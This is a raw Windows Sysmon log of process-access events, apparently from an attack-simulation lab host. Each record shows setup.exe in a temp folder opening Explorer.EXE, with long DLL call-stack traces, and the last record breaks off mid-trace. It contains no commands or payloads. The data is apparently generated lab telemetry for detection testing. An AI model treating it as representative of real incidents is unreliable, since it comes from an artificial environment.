10341000x800000000000000015195Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.474{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015194Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.474{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000015193Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.474{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64) 10341000x800000000000000015192Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.474{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015191Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.474{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015190Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.474{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000015189Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.474{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64) 10341000x800000000000000015188Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.474{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000015187Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.474{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000015186Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.474{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64) 10341000x800000000000000015185Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.474{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000015184Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.458{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015183Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.458{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015182Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.458{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015181Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.458{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000015180Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.458{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015179Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.458{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015178Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.458{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(